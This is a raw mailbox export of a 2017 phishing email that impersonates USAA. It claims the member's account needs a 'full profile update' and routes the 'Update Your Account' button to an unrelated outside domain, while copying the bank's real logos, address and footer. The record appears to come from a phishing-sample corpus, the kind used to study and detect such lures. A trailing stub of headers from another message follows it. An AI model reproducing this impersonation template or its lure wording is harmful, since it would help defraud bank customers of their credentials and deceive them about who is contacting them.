From: "USAA Web Service  " <Customer.mail@usaaservice.com>
Date: Tue, 23 May 2017 07:18:39 -0500
Message-Id: <20170523122301.RQT9153.dukecmmtar04.coxmail.com@dukecmimpo02.coxmail.com>
Status: O
X-Status: 
X-Keywords:                  
X-UID: 196

You will not see this in a MIME-aware mail reader.
--===============1719197927==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

         =

    To ensure delivery to your inbox, please add  USAA.Customer.Service@mai=
lcenter.usaa.com  to your address book.  	 =

    	   	   	 =

    	   	  =

     	       	  =

  =

  	 	 =

  	 	 =

  	 	 =

 	 =

  USAA SECURITY ZONE =

  =

  =

 	 =

 	 =

  	 =

  	 =

  	 =

  	 =

 	 =

  	   	   	 =

    	  =

                 Important Security Preferences  	 =

  	   	 =

    	   	  =

 <!--*#AOLMsgPart_2_60246341-f58f-45c2-95a5-673284546f99 td { color: black;=
 } *.aolReplacedBody div.aolmail_Section1 { page: Section1; } *.aolReplaced=
Body p.aolmail_normal { font-family: Verdana; font-size: 10.0pt; font-varia=
nt: normal; text-align: left; text-transform: none; margin-top: 0.0pt; marg=
in-right: 0.0pt; margin-bottom: 0.0pt; margin-left: 0.0pt; } *.aolReplacedB=
ody table.aolmail_normal { font-family: "Times New Roman"; font-size: 10.0p=
t; font-variant: normal; text-align: left; text-transform: none; margin-top=
: 0.0pt; margin-right: 0.0pt; margin-bottom: 0.0pt; margin-left: 0.0pt; bor=
der-collapse: collapse; } -->   Dear Member      Our records show that your=
 USAA account requires full profile update. USAA values your business and i=
s committed to keeping your accounts and personal information safe.        =

    =

      =

      =

      Update Your Account      =

              Safeguarding your information is a priority for USAA. That's =
why we offer our members different levels of security to access accounts on=
 usaa.com or mobile.usaa.com.      We value your business and the opportuni=
ty to serve all your financial needs.     Thank you,  USAA      =

   USAA means United Services Automobile Association and its insurance, ban=
king and investment affiliates.  =

      =

 =

   =

     	    	                 	 =

  	 =

  	   	   	 =

   	 =

    	   	  =

   =

  Please do not reply to this e-mail. To contact USAA, visit our secure con=
tact page.
 =

 Privacy Promise
 =

 USAA, 9800 Fredericksburg Road, San Antonio, Texas 78288
 =

     We know what it means to serve - =

 Insurance  Banking  Investments  Retirement  Advice  =

 66658-1012    =

   	 =

  	   	   	 =

   	 =

              /*<![CDATA[*/ Wicket.Ajax.baseUrl=3D"mail/save?mailId=3Dtmai1=
4bf17bcd27216a2&amp;showExternalContent=3Dfalse"; /*]]>*/   =20
--===============1719197927==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<!DOCTYPE html>
<html class=3D"page-printpage" id=3D"html-tag" lang=3D"en-US">
<head>
<script type=3D"text/javascript" id=3D"id348">var ClientProperties =3D { br=
owser : {"os":"windows","engine":"gecko","classes":"windows gecko ff ff48",=
"family":"ff","version":"48.0"}};</script>


<meta name=3D"application.version" content=3D"2.26.11"/>
<meta name=3D"application.host" content=3D"lxa05a"/>
<meta name=3D"viewport" content=3D"user-scalable=3D0, width=3Ddevice-width,=
 initial-scale=3D1.0, maximum-scale=3D1.0"/>
<meta name=3D"format-detection" content=3D"telephone=3Dno"/>
<meta name=3D"robots" content=3D"noindex, nofollow"/>

<meta http-equiv=3D"content-type" content=3D"text/html; charset=3Diso-8859-=
1">
<style type=3D"text/css" ><!--
.page-printpage *{margin:0;outline:0;padding:0;vertical-align:top;} .page-p=
rintpage{width:100%;height:100%;} .page-printpage body{color:#000000;font-s=
ize:8pt;font-family:Verdana,Sans-Serif;} .page-printpage h1{font-size:14pt;=
font-weight:bold;margin-bottom:5mm;} .page-printpage h1.accessibility{displ=
ay:none;} .page-printpage h2,
.page-printpage h3,
.page-printpage h4,
.page-printpage h5,
.page-printpage h6{font-weight:bold;font-size:8pt;margin-bottom:5mm;} .page=
-printpage p{margin-bottom:5mm;} .page-printpage dl{margin-bottom:5mm;} .pa=
ge-printpage dl dt{font-weight:bold;float:left;margin-bottom:2mm;width:20mm=
;} .page-printpage dl dd{margin-bottom:2mm;} .page-printpage .wrapper{paddi=
ng:0 0 0 7mm;width:178mm;} .page-printpage .header{border-bottom:1px solid =
#7F7F7F;height:42px;padding-bottom:5mm;margin-bottom:5mm;} .page-printpage =
.body .mail-header{border-bottom:1px solid #7F7F7F;margin-bottom:7mm;} .pag=
e-printpage .body .mail-content{padding-bottom:5mm;} .page-printpage .foote=
r{border-top:1px solid #7F7F7F;} .page-printpage .footer ul{margin:0 7mm 7m=
m;} .page-printpage .footer h2{margin-top:5mm;}
/*# sourceMappingURL=3Dprintpage.css.map */
--></style>
</head>
<body class=3D"app">
<div class=3D"page js-component" id=3D"id349" data-component=3D"BasePage" d=
ata-component-callback-url=3D"./save;jsessionid=3DAA2B4C949A59ACCEBDE0F56F5=
169D4DF-n2.lxa05a?5-1.IBehaviorListener.0-page&amp;mailId=3Dtmai14bf17bcd27=
216a2&amp;showExternalContent=3Dfalse">

<div id=3D"blocker"></div>

<div class=3D"wrapper">
<div class=3D"body">
<div class=3D"mail-header">



<div id=3D"AOLMsgPart_2_60246341-f58f-45c2-95a5-673284546f99">

<div class=3D"aolReplacedBody" style=3D"width: auto;position: relative;">


<div align=3D"center">

<table bgcolor=3D"#0d2842" border=3D"0" cellpadding=3D"0" cellspacing=3D"0"=
 width=3D"650">

	<tbody><tr height=3D"25">
    	<td align=3D"center" colspan=3D"5" valign=3D"middle"> =

			<font face=3D"Verdana, sans-serif" style=3D"color: rgb(255,255,255);font=
-size: 9.0px;">
            	To ensure delivery to your inbox, please add =

                <a href=3D"mailto:USAA.Web.Services@customermail.usaa.com" =
onclick=3D"parent.window.location.href=3D&#39;.&#92;/compose&#92;/redirect;=
jsessionid=3DAA2B4C949A59ACCEBDE0F56F5169D4DF-n2.lxa05a?editorAction=3DNEW&=
amp;to=3DUSAA.Web.Services%40customermail.usaa.com&#39;; return false;" sty=
le=3D"color: rgb(255,255,255);font-size: 9.0px;" target=3D"_blank">
                USAA.Customer.Service@mailcenter.usaa.com
				</a> to your address book.
			</font>
        </td>
    </tr>

	<tr height=3D"3">
    	<td height=3D"3" width=3D"20">&nbsp; </td>    =

    	<td bgcolor=3D"#FFFFFF" colspan=3D"3" height=3D"3" width=3D"610">&nbsp=
;  </td>
    	<td height=3D"3" width=3D"20">&nbsp; </td>        =

    </tr>
	<tr height=3D"90">
    	<td width=3D"20">&nbsp; </td>
    	<td bgcolor=3D"#FFFFFF" width=3D"5">&nbsp; </td>        =

    	<td bgcolor=3D"#FFFFFF" width=3D"600">
        =

          <table border=3D"0" cellpadding=3D"0" cellspacing=3D"0" width=3D"=
600">
          <tbody><tr>
          <td height=3D"45" width=3D"30"> <a href=3D"">   <img alt=3D"" bor=
der=3D"0" height=3D"80" src=3D"http://content.usaa.com/mcontent/static_asse=
ts/om/Media/SENDS_USAA_COLOR_LOGO.jpg" width=3D"73"/></a>
          </td>
          =

          <td>
          =

<div>&nbsp;
          </div>

          <font face=3D"Verdana, sans-serif" style=3D"color: rgb(255,255,25=
5);font-size: 12.0px;line-height: 18.0px;">
          </font>
          </td>
          <td align=3D"right" height=3D"45" valign=3D"middle" width=3D"367">
          <table border=3D"0" cellpadding=3D"0" cellspacing=3D"0" height=3D=
"65" width=3D"188"> <tbody><tr> <td width=3D"22"><table border=3D"0" cellpa=
dding=3D"0" cellspacing=3D"0" height=3D"65" width=3D"22"> <tbody><tr> <td h=
eight=3D"29" style=3D"line-height: 0;" valign=3D"top" width=3D"8"><img alt=
=3D"" border=3D"0" height=3D"29" src=3D"https://content.usaa.com/mcontent/s=
tatic_assets/Media/email_sec_1-1.gif?EID=3D6568976748" style=3D"display: bl=
ock;" width=3D"8"/></td> <td bgcolor=3D"#e7e7e8" height=3D"29" style=3D"lin=
e-height: 0;" valign=3D"top" width=3D"14"><img alt=3D"" border=3D"0" height=
=3D"29" src=3D"https://content.usaa.com/mcontent/static_assets/Media/email_=
sec_1-2.gif" style=3D"display: block;" width=3D"14"/></td> </tr> <tr> <td h=
eight=3D"29" style=3D"line-height: 0;" valign=3D"top" width=3D"8"><img alt=
=3D"" border=3D"0" height=3D"29" src=3D"https://content.usaa.com/mcontent/s=
tatic_assets/Media/email_sec_spacer.gif" style=3D"display: block;" width=3D=
"8"/></td> <td bgcolor=3D"#e7e7e8" height=3D"29" style=3D"line-height: 0;" =
valign=3D"top" width=3D"14"><img alt=3D"" border=3D"0" height=3D"29" src=3D=
"https://content.usaa.com/mcontent/static_assets/Media/email_sec_spacer.gif=
" style=3D"display: block;" width=3D"14"/></td> </tr> <tr> <td height=3D"7"=
 style=3D"line-height: 0;" valign=3D"bottom" width=3D"8"></td> <td bgcolor=
=3D"#e7e7e8" height=3D"7" style=3D"line-height: 0;" valign=3D"bottom" width=
=3D"14"><img alt=3D"" border=3D"0" height=3D"7" src=3D"https://content.usaa=
.com/mcontent/static_assets/Media/email_sec_2-1.gif" style=3D"display: bloc=
k;" width=3D"14"/></td> </tr> </tbody></table></td> <td align=3D"left" bgco=
lor=3D"#e7e7e8"><table border=3D"0" cellpadding=3D"5" cellspacing=3D"0" hei=
ght=3D"65" width=3D"100%"> <tbody><tr> <td align=3D"left" style=3D"text-ali=
gn: left;font-size: 9.0px;line-height: 12.0px;" valign=3D"middle"><font fac=
e=3D"Arial, Helvetica, sans-serif" style=3D"font-size: 10.0px;color: rgb(0,=
54,91);"><strong>USAA SECURITY ZONE</strong></font> <br/>
 <font face=3D"Arial, Helvetica, sans-serif" style=3D"font-size: 9.0px;colo=
r: rgb(0,54,91);"></font> <br/>
 <font face=3D"Arial, Helvetica, sans-serif" style=3D"font-size: 9.0px;colo=
r: rgb(0,54,91);"></font> <br/>
 <font face=3D"Arial, Helvetica, sans-serif" style=3D"font-size: 9.0px;colo=
r: rgb(0,54,91);"></font></td> </tr> </tbody></table></td> <td bgcolor=3D"#=
ffffff" width=3D"7"><table border=3D"0" cellpadding=3D"0" cellspacing=3D"0"=
 height=3D"65" width=3D"7"> <tbody><tr> <td align=3D"right" bgcolor=3D"#e7e=
7e8" height=3D"7" style=3D"line-height: 0;" valign=3D"top" width=3D"7"><img=
 alt=3D"" border=3D"0" height=3D"7" src=3D"https://content.usaa.com/mconten=
t/static_assets/Media/email_sec_1-3.gif" style=3D"display: block;" width=3D=
"7"/></td> </tr> <tr> <td align=3D"right" bgcolor=3D"#e7e7e8" height=3D"51"=
 style=3D"line-height: 0;" valign=3D"top" width=3D"7"><img alt=3D"" border=
=3D"0" height=3D"51" src=3D"https://content.usaa.com/mcontent/static_assets=
/Media/email_sec_spacer.gif" style=3D"display: block;" width=3D"7"/></td> <=
/tr> <tr> <td align=3D"right" bgcolor=3D"#e7e7e8" height=3D"7" style=3D"lin=
e-height: 0;" valign=3D"bottom" width=3D"7"><img alt=3D"" border=3D"0" heig=
ht=3D"7" src=3D"https://content.usaa.com/mcontent/static_assets/Media/email=
_sec_2-2.gif" style=3D"display: block;" width=3D"7"/></td> </tr> </tbody></=
table> </td> </tr> </tbody></table></td>
          </tr>
          </tbody></table>
        =

        </td>
    	<td bgcolor=3D"#FFFFFF" width=3D"5">&nbsp; </td>
    	<td width=3D"20">&nbsp; </td>
    </tr>


	<tr>
		<td width=3D"20">&nbsp; </td>
        <td colspan=3D"3" width=3D"610">
            =

            =

            <table align=3D"left" border=3D"0" cellpadding=3D"0" cellspacin=
g=3D"0" width=3D"610">
            <tbody><tr align=3D"left">
            <td background=3D"http://content.usaa.com/mcontent/static_asset=
s/om/Media/thumbnails/Blue_Strip_With_Red_A.gif" height=3D"72" style=3D"ver=
tical-align: middle;">
            =

            =

            =

            <font face=3D"Verdana, sans-serif" style=3D"color: rgb(255,255,=
255);font-size: 16.0px;"><b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Important Security Preferences </b></f=
ont>
            =

            </td>
            </tr>
            </tbody></table>
            =

        </td>
		<td width=3D"20">&nbsp; </td>        =

    </tr>


	<tr>
    	<td width=3D"20">&nbsp; </td>
    	<td bgcolor=3D"#FFFFFF" width=3D"5">&nbsp; </td>        =

    	<td align=3D"left" bgcolor=3D"#FFFFFF" width=3D"600">
          <br/>

          =

          <style type=3D"text/css"><!--*#AOLMsgPart_2_60246341-f58f-45c2-95=
a5-673284546f99 td {
	color: black;
}
*.aolReplacedBody div.aolmail_Section1 {
	page: Section1;
}
*.aolReplacedBody p.aolmail_normal {
	font-family: Verdana;
	font-size: 10.0pt;
	font-variant: normal;
	text-align: left;
	text-transform: none;
	margin-top: 0.0pt;
	margin-right: 0.0pt;
	margin-bottom: 0.0pt;
	margin-left: 0.0pt;
}
*.aolReplacedBody table.aolmail_normal {
	font-family: "Times New Roman";
	font-size: 10.0pt;
	font-variant: normal;
	text-align: left;
	text-transform: none;
	margin-top: 0.0pt;
	margin-right: 0.0pt;
	margin-bottom: 0.0pt;
	margin-left: 0.0pt;
	border-collapse: collapse;
}
--></style>        =

<div class=3D"aolmail_Section1">
<div style=3D"margin-left: 1.0em;margin-right: 1.0em;">            =

<div class=3D"aolmail_normal" style=3D"font-style: normal;margin-bottom: 0.=
0pt;">Dear                    Member<span style=3D"color: rgb(51,51,51);"> =
</span><span style=3D"color: rgb(0,0,0);"><span></span></span><span style=
=3D"color: rgb(0,0,0);text-align: left;text-transform: none;vertical-align:=
 baseline;"></span>            </div>
            =

<div class=3D"aolmail_normal" style=3D"font-style: normal;margin-bottom: 0.=
0pt;"><span></span><span>&nbsp;</span>            </div>
            =

<div class=3D"aolmail_normal" style=3D"font-style: normal;margin-bottom: 0.=
0pt;">Our                records show that your USAA account requires full =
profile update<span style=3D"text-align: left;text-transform: none;vertical=
-align: baseline;display: none;"></span>.  USAA values your business and is=
 committed to keeping your accounts and personal information safe. </div>
            =

<div class=3D"aolmail_normal" style=3D"font-style: normal;margin-bottom: 0.=
0pt;"><span></span><span>&nbsp;</span>            </div>
           =



<span style=3D"color:#333333"> </span> </div> <table style=3D"font-style:no=
rmal;margin-left:36.25pt;width:387.0pt"> <tbody><tr> <td style=3D"padding-t=
op:0.0in;padding-right:0.0in;padding-bottom:0.0in;padding-left:0.0in;width:=
121.25pt;border:none" valign=3D"top"><div style=3D"font-style:normal;margin=
-bottom:0.0pt"> <b> </td></tr> </tbody></table> <div style=3D"font-style:no=
rmal;margin-bottom:0.0pt"><span style=3D"color:#333333"><span></span></span=
><span style=3D"color:#333333"> </span> </div> <div style=3D"font-style:nor=
mal;margin-bottom:0.0pt"><span style=3D"color:#333333"> </span><span style=
=3D"color:#333333"><span></span></span><br><span style=3D"color:#333333"></=
span> </div> <div style=3D"font-style:normal;margin-bottom:0.0pt"><span sty=
le=3D"color:#333333"><span></span></span><span style=3D"color:#333333"> </s=
pan> </div> <div align=3D"center"> <table style=3D"background:#85864a;font-=
style:normal"> <tbody><tr style=3D"height:0.3in"> <td style=3D"padding-top:=
0.0in;padding-right:5.4pt;padding-bottom:0.0in;padding-left:5.4pt;width:2.2=
in;height:0.3in;border:none"><div style=3D"line-height:115.0%;font-style:no=
rmal;text-align:center;margin-bottom:0.0pt"><span style=3D"font-size:5.0pt;=
line-height:115.0%"><span></span></span><span style=3D"font-size:5.0pt;line=
-height:115.0%"> </span> </div> <div style=3D"line-height:115.0%;font-style=
:normal;text-align:center;margin-bottom:0.0pt"> <b><span style=3D"color:whi=
te"><a rel=3D"nofollow noreferrer" href=3D"https://www.google.com/" style=
=3D"color:blue;text-decoration:underline" target=3D"_blank" data-saferedire=
cturl=3D"https://www.google.com/url"></a><a rel=3D"nofollow noreferrer" hre=
f=3D"http://www.blancmarine.com/casicu/" style=3D"color:white" target=3D"_b=
lank" data-saferedirecturl=3D"https://www.google.com/url?">Update Your Acco=
unt</a></span></b> <b><span style=3D"color:white"><span></span></span></b> =
</div> <div style=3D"line-height:115.0%;font-style:normal;text-align:center=
;margin-bottom:0.0pt"><span style=3D"font-size:5.0pt;line-height:115.0%"><s=
pan></span></span><span style=3D"font-size:5.0pt;line-height:115.0%"> </spa=
n> </div> </td></tr> </tbody></table> </div> <div style=3D"font-style:norma=
l;margin-bottom:0.0pt"><span style=3D"color:#333333"><span></span></span><s=
pan style=3D"color:#333333"> </span>
					=

<div class=3D"aolmail_normal" style=3D"font-style: normal;margin-bottom: 0.=
0pt;"><span style=3D"font-size: 1.0pt;"><span style=3D"text-align: left;tex=
t-transform: none;">    </span><span></span></span><span style=3D"font-size=
: 1.0pt;"></span>            </div>
            =

<div class=3D"aolmail_normal" style=3D"font-style: normal;margin-bottom: 0.=
0pt;"><span></span><span>&nbsp;</span>            </div>
            =

<div class=3D"aolmail_normal" style=3D"font-style: normal;margin-bottom: 0.=
0pt;"><span><span></span></span><span>&nbsp;</span>            </div>
            =

<div class=3D"aolmail_normal" style=3D"font-style: normal;margin-bottom: 0.=
0pt;"><span>Safeguarding your information is a priority for USAA. That&#39;=
s why we offer our members different levels of security to access accounts =
on usaa.com or mobile.usaa.com. <span></span></span><span></span>          =
  </div>
            =

<div class=3D"aolmail_normal" style=3D"font-style: normal;margin-bottom: 0.=
0pt;"><span><span></span></span><span>&nbsp;</span>            </div>
            =

<div class=3D"aolmail_normal" style=3D"font-style: normal;margin-bottom: 0.=
0pt;"><span>We value your business and the opportunity to serve all your fi=
nancial needs.<span></span></span><span></span>            </div>
            =

<div class=3D"aolmail_normal" style=3D"font-style: normal;margin-bottom: 0.=
0pt;"><span><span></span></span><span>&nbsp;</span>            </div>
            =

<div class=3D"aolmail_normal" style=3D"font-style: normal;margin-bottom: 0.=
0pt;"><span>Thank you,<span></span></span><span></span>            </div>
            =

<div class=3D"aolmail_normal" style=3D"font-style: normal;margin-bottom: 0.=
0pt;"><span>USAA<span></span></span><span></span>            </div>
            =

<div class=3D"aolmail_normal" style=3D"font-style: normal;margin-bottom: 0.=
0pt;"><span style=3D"font-size: 5.0pt;"><span></span></span><span style=3D"=
font-size: 5.0pt;">&nbsp;</span>            </div>
            </div>
<table class=3D"aolmail_normal" style=3D"font-style: normal;margin-left: 4.=
5pt;">                <tbody><tr>                    <td style=3D"padding-t=
op: 0.0in;padding-right: 0.0in;padding-bottom: 0.0in;padding-left: 0.0in;wi=
dth: 5.75in;border: none;" valign=3D"top">
<div class=3D"aolmail_normal" style=3D"font-style: normal;margin-bottom: 0.=
0pt;margin-left: 7.9pt;"><span style=3D"font-size: 8.0pt;">USAA means Unite=
d Services Automobile Association and its insurance, banking and investment=
 affiliates.<span></span></span><span style=3D"font-size: 8.0pt;"></span>  =
                      </div>
                    </td></tr>            </tbody></table>            =

<div class=3D"aolmail_normal" style=3D"font-style: normal;margin-bottom: 0.=
0pt;"><span style=3D"font-size: 7.0pt;"><span></span></span><span style=3D"=
font-size: 7.0pt;">&nbsp;</span>            </div>
        </div>
   =

           =

          =

          <br/>

          =

          <table border=3D"0" cellpadding=3D"0" cellspacing=3D"0" width=3D"=
600">
          <tbody><tr>			=

          <td align=3D"left" width=3D"95%">
          <table>
          <tbody><tr>
          <td align=3D"left" height=3D"30" width=3D"40%">
          <a href=3D""><img alt=3D"Member Community" border=3D"0" height=3D=
"40" src=3D"http://content.usaa.com/mcontent/static_assets/om/Media/thumbna=
ils/Member_Community.gif" width=3D"232"/></a>&nbsp;
          </td>
          <td align=3D"center" height=3D"30" width=3D"30%">
          <a href=3D""><img alt=3D"Go Mobile" border=3D"0" height=3D"32" sr=
c=3D"http://content.usaa.com/mcontent/static_assets/om/Media/thumbnails/Go_=
Mobile.gif" width=3D"91"/></a>&nbsp;
          </td>
          <td align=3D"right" height=3D"30" width=3D"30%">
          <a href=3D"">
          <img alt=3D"Facebook" border=3D"0" height=3D"32" src=3D"http://co=
ntent.usaa.com/mcontent/static_assets/om/Media/thumbnails/facebook_new.gif"=
 width=3D"32"/></a>&nbsp;&nbsp;
          <a href=3D"">
          <img alt=3D"Twitter" border=3D"0" height=3D"32" src=3D"http://con=
tent.usaa.com/mcontent/static_assets/om/Media/thumbnails/twitter_new.gif" w=
idth=3D"32"/></a>&nbsp;&nbsp;
          <a href=3D"">
          <img alt=3D"You Tube" border=3D"0" height=3D"32" src=3D"http://co=
ntent.usaa.com/mcontent/static_assets/om/Media/thumbnails/youtube_new.gif" =
width=3D"32"/></a>&nbsp;&nbsp;
          <a href=3D"">
          <img alt=3D"More" border=3D"0" height=3D"32" src=3D"http://conten=
t.usaa.com/mcontent/static_assets/om/Media/thumbnails/moreicon_new.gif" wid=
th=3D"32"/>
          </a>
          </td>
          </tr>
          </tbody></table>
          </td>
          </tr>
          </tbody></table>
          =

        </td>
    	<td bgcolor=3D"#FFFFFF" width=3D"5">&nbsp; </td>        =

    	<td width=3D"20">&nbsp; </td>
    </tr>

    =

    <tr height=3D"25">
    	<td colspan=3D"5">
        </td>
	</tr>


    <tr>
    	<td width=3D"20">&nbsp; </td>
    	<td bgcolor=3D"#FFFFFF" width=3D"5">&nbsp; </td>        =

    	<td bgcolor=3D"#FFFFFF" width=3D"600">

          <table border=3D"0" cellpadding=3D"0" cellspacing=3D"0" width=3D"=
600">
          <tbody><tr>
          <td align=3D"center" bgcolor=3D"#FFFFFF" colspan=3D"0" width=3D"6=
00">
          =

          <br/>
<font face=3D"Verdana, sans-serif" style=3D"color: rgb(0,0,0);font-size: 10=
.0px;">
          =

          <font face=3D"Verdana, sans-serif" style=3D"color: rgb(0,0,0);fon=
t-size: 10.0px;">Please do not reply to this e-mail. To contact USAA, visit=
 our secure</font> =

          <a href=3D"">contact page</a>.<br/>
<br/>

          =

           <a href=3D"">Privacy Promise</a><br/>
<br/>

          =

          USAA, 9800 Fredericksburg Road, San Antonio, Texas 78288<br/>
<br/>

          =

          =

          =

          							=

          =

<div align=3D"left"><font face=3D"Verdana, sans-serif" style=3D"color: rgb(=
0,0,0);font-size: 10.0px;line-height: 20.0px;"></font>
          </div>

          <font face=3D"Verdana, sans-serif" style=3D"color: rgb(0,0,0);fon=
t-size: 10.0px;line-height: 18.0px;">
          =

          <a href=3D""><img alt=3D"" border=3D"0" height=3D"80" src=3D"http=
://content.usaa.com/mcontent/static_assets/om/Media/SENDS_USAA_COLOR_LOGO.j=
pg" width=3D"73"/></a>
          =

          =

<div align=3D"center">We know what it means to serve <sup>&reg;</sup>
          <br/>

          Insurance&nbsp;&nbsp;Banking&nbsp;&nbsp;Investments&nbsp;&nbsp;Re=
tirement&nbsp;&nbsp;Advice
          </div>

          <br/>

          =

          =

<div align=3D"right">66658-1012&nbsp;&nbsp;
          </div>

          <br/>

          </font>
          </font>
          </td>
          </tr>
          </tbody></table>        =

        =

        </td>
    	<td bgcolor=3D"#FFFFFF" width=3D"5">&nbsp; </td>        =

    	<td width=3D"20">&nbsp; </td>
    </tr>


    <tr height=3D"25">
    	<td colspan=3D"5">
        </td>
    </tr>
    =

</tbody></table>
</div>

  =

</div>

</div>

</div>
</font></div>
</div>

</div>

</div>

<div id=3D"uploadContainer"></div>

<script type=3D"text/javascript" src=3D"//js.ui-portal.de/apps/shared/jquer=
y/1.8.3/jquery-1.8.3.min.js"></script>
<script type=3D"text/javascript" src=3D"https://sec-s.uicdn.com/3c-cdn/mail=
/client/wicket/resource/static-res/---/js/core-vEr-3534326336313136.js"></s=
cript>
<script type=3D"text/javascript" id=3D"wicket-ajax-base-url">
/*<![CDATA[*/
Wicket.Ajax.baseUrl=3D"mail/save?mailId=3Dtmai14bf17bcd27216a2&amp;showExte=
rnalContent=3Dfalse";
/*]]>*/
</script>
<script type=3D"text/javascript" src=3D"https://sec-s.uicdn.com/3c-cdn/mail=
/client/wicket/resource/static-res/---/js/jqueryui-vEr-6532663337626534.js"=
></script>
<script type=3D"text/javascript" src=3D"https://sec-s.uicdn.com/3c-cdn/mail=
/client/wicket/resource/static-res/---/js/behavior-vEr-6164336336383136.js"=
></script>




</body>
</html>

--===============1719197927==--

From jose@monkey.org Tue May 23 23:24:45 2017 +0000
Return-Path: postmaster@001mail.domain.com
Delivered-To: jose@monkey.org
X-FDA: 72872400930.14.mask77_80d46794a2b0d
X-Spam-Summary: 88,1.2,0,465d76c5efee8c65,d41d8cd98f00b204,postmaster@001mail.domain.com,:,RULES_HIT:41:72:355:375:379:495:800:962:967:969:973:983:988:989:1147:1189:1208:1224:1260:1263:1311:1313:1314:1345:1381:1431:1433:1434:1437:1513:1515:1516:1517:1521:1534:1542:1571:1589:1593:1594:1685:1711:1714:1730:1747:1777:1792:2196:2198:2199:2200:2393:2525:2560:2563:2610:2682:2685:2693:2737:2790:2828:2859:2890:2894:2933:2937:2939:2942:2945:2947:2951:2954:3022:3041:3138:3139:3140:3141:3142:3351:3865:3866:3867:3868:3871:3872:3873:3874:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4361:4552:5007:6261:6669:6674:6678:7652:8516:8518:8603:8671:8960:9025:9072:9388:9466:10008:10049:10346:11480:11657:11658:11914:12043:12517:12519:12903:12955:13025:13095:13139:13374:13439:14093:14096:14181:14721:14828:14849:14877:21080:21433:21450:21451:21524:21627:30001:30021:30022:30054,0,RBL:80.76.176.195-irl.urbl.hostedemail.com-127.0.0.175,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:n
X-HE-Tag: mask77_80d46794a2b0d
X-Filterd-Recvd-Size: 3558
Received: from orel-esc.ru (unknown [80.76.176.195])
	by imf23.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Tue, 23 May 2017 23:24:45 +0000 (UTC)
Received: from [84.38.132.10] (port=56827 helo=001mail.domain.com)
	by orel-esc.ru with esmtpsa (TLS1.0:DHE_RSA_AES_256_CBC_SHA1:32)
	(Exim 4.72)
	(envelope-from <Postmaster@001mail.domain.com>)
	id 1dDJAR-0004ra-8R
	for jose@monkey.org; Wed, 24 May 2017 02:24:43 +0300
